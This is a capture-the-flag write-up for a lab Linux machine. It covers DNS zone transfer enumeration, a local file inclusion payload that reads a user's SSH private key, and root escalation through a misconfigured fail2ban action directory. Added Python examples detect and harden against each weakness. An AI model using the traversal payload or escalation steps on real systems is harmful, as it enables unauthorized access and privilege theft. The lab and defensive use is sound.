Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 18 Jun 2022
IP: 10.10.11.166

Enumeration

Nmap scan result:

# Nmap 7.92 scan initiated Sat Jul  9 05:53:58 2022 as: nmap -sC -sV -oN scan.nmap -vvv 10.10.11.166
Increasing send delay for 10.10.11.166 from 0 to 5 due to 124 out of 413 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 5 to 10 due to 11 out of 28 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 10 to 20 due to 11 out of 15 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 20 to 40 due to 11 out of 15 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 40 to 80 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 80 to 160 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 160 to 320 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 320 to 640 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.11.166 from 640 to 1000 due to 11 out of 12 dropped probes since last increase.
Nmap scan report for 10.10.11.166
Host is up, received echo-reply ttl 63 (0.37s latency).
Scanned at 2022-07-09 05:53:59 UTC for 579s
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Rh57OmAndXFukHce0Tr4BL8CWC8yACwWdu8VZcBPGuMUH8VkvzqseeC8MYxt5SPL1aJmAsZSgOUreAJNlYNBBKjMoFwyDdArWhqDThlgBf6aqwqMRo3XWIcbQOBkrisgqcPnRKlwh+vqArsj5OAZaUq8zs7Q3elE6HrDnj779JHCc5eba+DR+Cqk1u4JxfC6mGsaNMAXoaRKsAYlwf4Yjhonl6A6MkWszz7t9q5r2bImuYAC0cvgiHJdgLcr0WJh+lV8YIkPyya1vJFp1gN4Pg7I6CmMaiWSMgSem5aVlKmrLMX10MWhewnyuH2ekMFXUKJ8wv4DgifiAIvd6AGR
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAoXvyMKuWhQvWx52EFXK9ytX/pGmjZptG8Kb+DOgKcGeBgGPKX3ZpryuGR44av0WnKP0gnRLWk7UCbqY3mxXU0=
| 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGY1WZWn9xuvXhfxFFm82J9eRGNYJ9NnfzECUm0faUXm
25/tcp open smtp syn-ack ttl 63 Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain syn-ack ttl 63 ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http syn-ack ttl 63 nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 9 06:03:38 2022 -- 1 IP address (1 host up) scanned in 579.81 seconds

Foothold

Found subdomains using a DNS zone transfer (AXFR) query:

dig axfr @10.10.11.166 trick.htb

; <<>> DiG 9.16.27-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 400 msec
;; SERVER: 10.10.11.166#53(10.10.11.166)
;; WHEN: Sat Jul 09 06:05:43 UTC 2022
;; XFR size: 6 records (messages 1, bytes 231)

Found 2 subdomains:

  • root.trick.htb
  • preprod-payroll.trick.htb
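The zone transfer above is the finding to record from the defender's side: an AXFR that any client can pull hands out every name in the zone, and BIND's allow-transfer should be limited to the secondaries. The Python below is an added example, not part of the original write-up: it parses dig's AXFR output (the sample is constructed from the transfer shown above), reports whether the server answered the transfer, lists the owner names that carry address or alias records, and pulls the responsible-party mailbox out of the SOA RNAME field, which dig prints as a dotted name (root.trick.htb.) rather than as a host.

```python
"""Summarise what a successful `dig axfr` leaked (added example, not from the page)."""
import re

# Constructed sample: the transfer output shown above, verbatim.
AXFR_OUTPUT = """\
; <<>> DiG 9.16.27-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 400 msec
;; XFR size: 6 records (messages 1, bytes 231)
"""

# owner  ttl  IN  type  rdata   (dig's default presentation format)
RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z]+)\s+(.*)$")


def parse_axfr(text):
    """Return (owner, ttl, rtype, rdata) tuples for each resource record line.
    Comment lines (';') are skipped. dig prints the SOA twice (it brackets the
    transfer), so identical records are collapsed to one."""
    records, seen = [], set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if not m:
            continue
        owner = m.group(1).rstrip(".")
        rec = (owner, int(m.group(2)), m.group(3), m.group(4).strip())
        key = (rec[0], rec[2], rec[3])
        if key in seen:
            continue
        seen.add(key)
        records.append(rec)
    return records


def transfer_allowed(text):
    """True when the output carries resource records, i.e. the server honoured
    the AXFR. A refusing server prints 'Transfer failed.' and no records."""
    return bool(parse_axfr(text))


def hostnames(records):
    """Owner names of A/AAAA/CNAME records: the host list an outsider obtains.
    NS and SOA records here are owned by the zone apex itself."""
    return sorted({r[0] for r in records if r[2] in ("A", "AAAA", "CNAME")})


def soa_contact(records):
    """The SOA RNAME field is a mailbox with '@' written as '.':
    'root.trick.htb.' means root@trick.htb, not a host named root."""
    for owner, _ttl, rtype, rdata in records:
        if rtype == "SOA":
            rname = rdata.split()[1].rstrip(".")
            user, _, domain = rname.partition(".")
            return f"{user}@{domain}"
    return None


if __name__ == "__main__":
    recs = parse_axfr(AXFR_OUTPUT)
    print("transfer answered:", transfer_allowed(AXFR_OUTPUT))
    print("hosts:", hostnames(recs))
    print("zone contact:", soa_contact(recs))
```

Run against a server that is configured correctly, dig prints "Transfer failed." and transfer_allowed() returns False; that makes the script usable as a periodic check on authoritative servers you operate.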

Opening preprod-payroll.trick.htb in the browser shows the “Employee’s Payroll Management System” admin page.

After some googling I found this: https://www.exploit-db.com/exploits/50403

The administrator credentials can be recovered using this SQL injection.

I tried multiple methods to get a user shell from here, but nothing worked.

User Flag

Continuing the enumeration turned up another subdomain: preprod-marketing.trick.htb

A local file inclusion (LFI) vulnerability was discovered in this application.

Using this payload: http://preprod-marketing.trick.htb/index.php?page=....//....//....//home/michael/.ssh/id_rsa

This exposes michael's OpenSSH private key.
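The ....// form of the payload is the usual bypass for an include filter that deletes ../ once instead of rejecting traversal: after a single non-recursive removal, ....// collapses back to ../. The page does not show preprod-marketing's source, so the vulnerable filter below is an assumption about why the payload works, not the application's code; the web root /var/www/market and the function names are likewise made up for this added example. The hardened variant joins the candidate to the root, normalises the result as a string and refuses anything that ends up outside the root.

```python
"""Assumed vulnerable include filter beside a canonical-path check (added example)."""
import posixpath

# Assumed document root for the example; not taken from the target.
WEBROOT = "/var/www/market"

# The request shown above, constructed here as test input.
PAYLOAD = "....//....//....//home/michael/.ssh/id_rsa"


def naive_include_path(page):
    """Vulnerable (assumed filter): delete '../' once, then serve from WEBROOT.
    str.replace is a single left-to-right pass, so each '....//' loses one
    '../' and leaves another '../' behind; the traversal survives intact."""
    cleaned = page.replace("../", "")
    return posixpath.normpath(posixpath.join(WEBROOT, cleaned))


def safe_include_path(page):
    """Hardened: reject empty, absolute and NUL-containing names, normalise the
    joined path, and require it to stay under WEBROOT. Returns None when the
    request would leave the root, so the caller can answer 404 instead."""
    if not page or page.startswith("/") or "\x00" in page:
        return None
    root = posixpath.normpath(WEBROOT)
    candidate = posixpath.normpath(posixpath.join(root, page))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    print("naive filter serves :", naive_include_path(PAYLOAD))
    print("hardened check gives:", safe_include_path(PAYLOAD))
    print("plain traversal     :", safe_include_path("../../../etc/passwd"))
```

posixpath.normpath works on the string alone, so the check is deterministic and runs offline; a deployed version should additionally compare the realpath of the opened file against the root (a symlink under the root can point outside it), and when the set of includable pages is fixed, an allowlist of names is simpler than any path check.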

Save the OpenSSH private key to a file.

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

Restrict the permissions on the key file (ssh refuses a private key that is readable by others):

chmod 600 micheal.key

Log in as michael with the key:

ssh -i micheal.key michael@10.10.11.166
Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Sep 6 20:37:26 2022 from 10.10.14.49
-bash-5.0$ cat user.txt
11c5d4f9e8f3010b5f347312fffxxxxx
-bash-5.0$

Got the user flag.

Root Flag

User michael may restart the fail2ban service as root via sudo:

bash-5.0$ sudo -l 
Matching Defaults entries for michael on trick:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
(root) NOPASSWD: /etc/init.d/fail2ban restart
bash-5.0$

Using this service we can escalate to the root user.

Reference: Abusing Fail2ban misconfiguration to escalate privileges on Linux

Members of the ‘security’ group can modify the /etc/fail2ban/action.d/ directory, but cannot change the contents of the existing files in it. Write permission on the directory is enough to delete and rename entries, which is what the following steps rely on.

bash-5.0$ ls -l /etc/fail2ban/
total 60
drwxrwx--- 2 root security 4096 Sep 6 20:46 action.d
-rw-r--r-- 1 root root 2334 Sep 6 20:45 fail2ban.conf
drwxr-xr-x 2 root root 4096 Sep 6 20:45 fail2ban.d
drwxr-xr-x 3 root root 4096 Sep 6 20:45 filter.d
-rw-r--r-- 1 root root 22908 Sep 6 20:45 jail.conf
drwxr-xr-x 2 root root 4096 Sep 6 20:45 jail.d
-rw-r--r-- 1 root root 645 Sep 6 20:45 paths-arch.conf
-rw-r--r-- 1 root root 2827 Sep 6 20:45 paths-common.conf
-rw-r--r-- 1 root root 573 Sep 6 20:45 paths-debian.conf
-rw-r--r-- 1 root root 738 Sep 6 20:45 paths-opensuse.conf
bash-5.0$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)
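From the defender's side the chain above needs two things at once: a fail2ban configuration directory that a non-root group can write, and a sudo rule that lets a member of that group restart the service as root. The Python below is an added audit example, not from the write-up or from fail2ban itself; it parses the three outputs shown above (ls -l, sudo -l and id, embedded here as constructed samples) and reports the combination. The fix is the obvious one: action.d owned root:root with mode 0755, and no sudo restart rule for users who can touch the configuration.

```python
"""Flag the writable-config + sudo-restart combination from ls/sudo/id output (added example)."""
import re

# Constructed samples: the command outputs shown above.
LS_OUTPUT = """\
total 60
drwxrwx--- 2 root security 4096 Sep 6 20:46 action.d
-rw-r--r-- 1 root root 2334 Sep 6 20:45 fail2ban.conf
drwxr-xr-x 2 root root 4096 Sep 6 20:45 fail2ban.d
drwxr-xr-x 3 root root 4096 Sep 6 20:45 filter.d
-rw-r--r-- 1 root root 22908 Sep 6 20:45 jail.conf
drwxr-xr-x 2 root root 4096 Sep 6 20:45 jail.d
-rw-r--r-- 1 root root 645 Sep 6 20:45 paths-arch.conf
"""
SUDO_OUTPUT = r"""Matching Defaults entries for michael on trick:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
(root) NOPASSWD: /etc/init.d/fail2ban restart
"""
ID_OUTPUT = "uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)"

# type, 9 mode chars, links, owner, group, size, month, day, time, name
LS_LINE = re.compile(
    r"^([d\-l])([rwxsStT\-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$"
)


def parse_ls(text):
    """Return one dict per entry line of an `ls -l` listing; 'total' is skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line.strip())
        if m:
            entries.append({"type": m.group(1), "mode": m.group(2),
                            "owner": m.group(3), "group": m.group(4),
                            "name": m.group(5)})
    return entries


def writable_by_non_root(entries):
    """Names whose owner, group or other write bit grants write access to
    someone other than root. Mode string layout: user=0-2, group=3-5, other=6-8."""
    flagged = []
    for e in entries:
        mode = e["mode"]
        if (mode[7] == "w"
                or (mode[4] == "w" and e["group"] != "root")
                or (mode[1] == "w" and e["owner"] != "root")):
            flagged.append(e["name"])
    return flagged


def user_groups(id_output):
    """Group names from the groups= field of `id`."""
    return set(re.findall(r"\d+\((\w+)\)", id_output.split("groups=")[1]))


def sudo_root_commands(sudo_output):
    """Commands runnable as root according to the '(root) ...' lines of `sudo -l`."""
    return [m.group(1).strip() for m in
            re.finditer(r"^\(root\)\s+(?:NOPASSWD:\s*)?(.+)$", sudo_output, re.M)]


def fail2ban_escalation_path(ls_output, sudo_output, id_output):
    """Describe the escalation path if this user can both modify fail2ban's
    configuration entries and restart fail2ban as root; otherwise None."""
    groups = user_groups(id_output)
    weak = [e["name"] for e in parse_ls(ls_output)
            if e["mode"][7] == "w" or (e["mode"][4] == "w" and e["group"] in groups)]
    restart = [c for c in sudo_root_commands(sudo_output) if "fail2ban" in c]
    if weak and restart:
        return f"user can write {weak} and run {restart} as root"
    return None


if __name__ == "__main__":
    print("writable by non-root:", writable_by_non_root(parse_ls(LS_OUTPUT)))
    print(fail2ban_escalation_path(LS_OUTPUT, SUDO_OUTPUT, ID_OUTPUT))
```

The same check is worth running across every directory fail2ban reads (action.d, filter.d, jail.d) rather than only the top level, since a writable entry anywhere in that tree is reached by the restart.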

Copy the existing action config /etc/fail2ban/action.d/iptables-multiport.conf:

cp /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak

As stated in the reference blog, modify the backup configuration.

Then delete the existing config:

rm /etc/fail2ban/action.d/iptables-multiport.conf

Rename the backup back to the original name:

mv /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf

Restart the fail2ban service so it loads the modified action:

bash-5.0$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.
bash-5.0$ cd /etc/fail2ban/action.d/

Trigger the ban by trying some invalid passwords over SSH:

ssh root@10.10.11.166
root@trick.htb's password:
Permission denied, please try again.
root@trick.htb's password:
Permission denied, please try again.
root@trick.htb's password:
root@trick.htb: Permission denied (publickey,password).

After three failed attempts the ban action fires and our modified action runs on the machine as root.

bash-5.0# id
uid=1001(michael) gid=1001(michael) euid=0(root) groups=1001(michael),1002(security)
bash-5.0# cd /root/
bash-5.0# cat root.txt
228c38a63500d91464833478d2xxxxxx
bash-5.0#

Copy and submit the root flag.